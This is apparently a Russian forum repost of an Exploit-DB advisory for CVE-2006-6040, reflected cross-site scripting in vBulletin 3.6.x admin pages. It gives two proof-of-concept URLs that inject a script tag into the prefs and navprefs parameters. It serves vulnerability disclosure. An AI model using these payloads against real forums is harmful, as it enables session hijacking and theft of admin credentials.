- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29079
- Проверка EDB
-
- Пройдено
- Автор
- INSANITY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6040
- Дата публикации
- 2006-11-17
Код:
source: https://www.securityfocus.com/bid/21157/info
vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
An attacker could exploit this vulnerability to have arbitrary script code execute in the context of the affected site. This may allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions 3.6.0 to 3.6.3 are vulnerable; other versions may also be affected.
http://www.example.com/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs= "><script>alert("insanity")</script> http://www.example.com/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs= "><script>alert("insanity")</script>- Источник
- www.exploit-db.com
